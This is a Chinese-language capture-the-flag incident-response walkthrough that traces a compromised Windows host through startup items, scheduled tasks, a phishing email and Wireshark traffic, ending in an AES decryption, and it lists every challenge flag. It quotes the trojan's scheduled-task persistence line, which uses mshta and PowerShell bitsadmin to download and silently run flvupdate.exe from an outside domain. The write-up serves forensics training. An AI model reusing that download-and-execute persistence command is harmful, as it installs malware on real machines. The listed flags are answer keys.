应急响应——威胁流量分析-WinFT详细溯源教程

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档

前置准备

某单位网管日常巡检中发现某员工电脑（IP：192.168.116.123）存在异常外连及数据传输行为，随后立即对该电脑进行断网处理，并启动网络安全应急预案进行排查。

文件名：82f13fdc9f7078ba29c4a6dcc65d8859.7z
文件大小：14.8g

• 下载链接1：https://pan.baidu.com/s/1hHX8J13EWRAfm3e-qakuDw 提取码：GAME
• 下载链接2：https://drive.google.com/file/d/14RBdzdozTHIwJs_tveivjwOqclcp2rhL/view
• 解压密码：3604e2f3-585a-4972-a867-3a9cc8d34c1d

来源：长城杯&CISCN官网

题目列表

1. 受控机木马的回连域名及ip及端口是（示例：flag{xxx.com:127.0.0.1:2333}）2. 受控机启动项中隐藏 flag 是3. 受控机中驻留的 flag 是4. 受控源头隐藏的 flag 是5. 分析流量，获得压缩包中得到答案6. 通过 aes 解密得到的 flag

这里我们下载好靶场后，界面如下：

当前靶机地址：192.168.116.123

话不多说，我们直接开始溯源过程；

应急溯源

我们首先打开“雷鸟Thunderbird"邮件系统，发现并没有任何可用的信息：

所以只能换到”火绒剑“的记录是否存在有用信息：

系统启动项

查看系统启动项，暂时没有发现可疑信息：

系统服务

随后切换页面，好像是个”恶意程序 / 脚本“？不确定，先记录下来，之后再去求证：

网络连接

翻看网络连接的时候，发现了了一个陌生的IP地址外连192.168.116.130（有可能是攻击者控制的机器）

基于上述的判断，我们得到相应的进程名字为：flvupdate.exe

所以我们用everything去查找一下相应程序的文件位置：

得到文件的位置：C:\Users\Public\Documents\flvupdate.exe

进入到相应文件搜集更多信息：

执行该程序，看看其回连地址是多少：

计划任务

同时我们查看”计划任务“，再次确认了该恶意程序的可能性：

"mshta""javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Run('cmd /c taskkill /f /im flvupdate.exe & start C:\\Users\\Public\\Documents\\flvupdate.exe', 0, true); close();""powershell"-WindowStyleHidden-Command"bitsadmin /transfer mydownloadjob /download /priority high http://miscflvol.com/flvupdate.exe C:\Users\Public\documents\flvupdate.exe; start C:\Users\Public\documents\flvupdate.exe"

将其扔进沙箱里进行分析：

最后也是得到了它的域名：miscsecure.com

综上所述，我们可以推测得到第一题的flag：

flag{miscsecure.com:192.168.116.130:443}

检查启动项 / 计划任务中隐藏 flag

根据题目给出信息，我们直接缩小了查找的范围：开机启动项

或者输入命令msconfig，也可以直接查看启动项：

不过简单观察了一下，好像没找到可疑程序？flag更是无从谈起；

那就打开计划任务再检查一下：taskschd.msc

成功发现了flag：

f^l^a^g^:JiM3ODsmIzEwNTsmIzk5OyYjMTAxOyYjNjUyOTI7JiMxMDI7JiMxMDg7JiM5NzsmIzEwMzsmIzMyOyYjMTA1OyYjMTE1OyYjMzI7JiMxMjM7JiM2NTsmIzY5OyYjODM7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzk1OyYjMTA1OyYjMTE1OyYjOTU7JiM5NzsmIzExMDsmIzk1OyYjMTAxOyYjMTIwOyYjOTk7JiMxMDE7JiMxMDg7JiMxMDg7JiMxMDE7JiMxMTA7JiMxMTY7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzEyNTs=

首先对其Base64解密，发现还有一层HTML加密

再次对其进行解密，即可获取flag：

flag如下：

flag{AES_encryption_algorithm_is_an_excellent_encryption_algorithm}

本机留下的隐藏flag

这里我检查了”隐藏用户“以及”系统日志“，均未发现可疑信息：

也没有远程爆破的记录：

随后想到之前的flag字符串：

f^l^a^g^

所以尝试一下全局搜索，发现了一个压缩包：

放到本地进行分析：

看到文件开头，发现是用7z.zip进行压缩加密的，所以我们加个zip后缀，尝试一下密码：恶意软件的名字 flvupdate

成功得到了结果：

flag{Timeline_correlation_is_a_very_important_part_of_the_digital_forensics_process}

受控源头隐藏的 flag

这里刚好没了思路，但看了一眼上面的flag信息：

• 时间线相关性是数字取证过程中非常重要的一部分
• 嗯？

根据提示，我们只能再次打开之前的”雷鸟“邮件：

可以看到的是，有1000条信息，人工查找肯定是不可能的：

所以我们需要结合一下攻击者的攻击时间：2024/11/20 18:55

也是缩小了搜寻范围；

看了几个邮件，发现有一个是有文件的附件，其他都是正常的格式

下载扔到沙箱里分析：

既然是恶意邮件，那我们就重点筛选该发件人safe@service.autorevertech.cn的来往记录；

可以看到有一共两条信息：

打开该邮件的瞬间，弹出了一个cmd窗口，随后消失不见，所以这里我到进程里去查看了一下，果然发现了外连地址：

随后查看一下邮件源代码

经过base64解码——url解码——base64解码，成功得到了flag：

base64解码 Hello, this is the access link,<ahref="https://autorevertech.com?key=%61%47%6E%76%76%49%78%6D%62%47%46%6E%49%47%6C%7A%49%48%74%55%61%47%55%67%53%6D%39%31%63%6D%35%6C%65%53%42%30%62%79%42%30%61%47%55%67%56%32%56%7A%64%48%30%3D">please click and get</a>. Thank you very much!url解码aGnvvIxmbGFnIGlzIHtUaGUgSm91cm5leSB0byB0aGUgV2VzdH0=base64解码 hi，flag is{The Journey to the West}

–

分析流量，获得压缩包中得到答案

我们搜索.pcap后缀，也是成功发现了流量包：

这里将流量包下载到本地：（不熟悉流量分析的师傅，可以看看下列文章）

• Wireshark流量分析案例篇（手把手教学基础篇）
• Solar月赛emergency靶场溯源过程（内含靶机下载以及流量分析）
• 记一次某公司流量应急溯源分析（附带下载链接）

首先查一下统计IP，找到通信最多的两个IP地址：

我们还可以看到在某一时间段，还存在”文件数据“的传输：

在Wireshark里，我们发现了许多文件传输的记录：

再将其大小进行排序：

打开相应记录，在底部发现了压缩包的名称：Everything.zip

打开后却发现flag文档是加密的：

根据底部的提示，将其解码，得到信息：时间线关联非常重要

死马当活马医，直接把它当密码试试。。。

得到了flag：

flag{a1b2c3d4e5f67890abcdef1234567890-2f4d90a1b7c8e2349d3f56e0a9b01b8a-CBC}

–

通过 aes 解密得到的 flag

要想得到flag，我们需要知道的是：aes加密的密钥key和偏移量IV以及加密模式CBC

• 对于上一题的答案进行分析，可以确定 AES 的参数
• Mode: CBC
• Key: a1b2c3d4e5f67890abcdef1234567890
• iv: 2f4d90a1b7c8e2349d3f56e0a9b01b8a

在Wireshark里输入过滤式：

ip.addr==192.168.116.130 and http

发现了很多记录：

发现很像aes加密的字符串，解密后发现不是；

继续找，过滤字段长度为16倍数的

data.len>=16and data.len %16==0and ip.addr==192.168.116.130

将其解码后得到flag：

fromCrypto.CipherimportAESfrombinasciiimportunhexlify key_hex="a1b2c3d4e5f67890abcdef1234567890"iv_hex="2f4d90a1b7c8e2349d3f56e0a9b01b8a"ct_hex="a7b86dfc266043b2a7750f0a9c4a02a269bc72acc55f501d7bc37af237b6abc280a5d0ddb393f79a07bfa5cc0a432086"key=unhexlify(key_hex)iv=unhexlify(iv_hex)ct=unhexlify(ct_hex)cipher=AES.new(key,AES.MODE_CBC,iv)pt=cipher.decrypt(ct)# 去PKCS7 paddingpad_len=pt[-1]pt=pt[:-pad_len]print(pt.decode())

flag如下：

flag{Hey, keep going andlookforanother flag}

总结

本教程基于威胁流量分析与WinFT取证思路，围绕一次完整的受控主机溯源过程展开。从流量抓包、启动项分析到驻留文件定位，再结合压缩包提取与AES解密，还原攻击链路与关键信息。内容覆盖木马回连特征识别、系统持久化痕迹检测及密文数据还原等多个环节，帮助构建从网络层到主机层的完整分析路径，用于理解常见攻击行为的溯源方法与取证逻辑。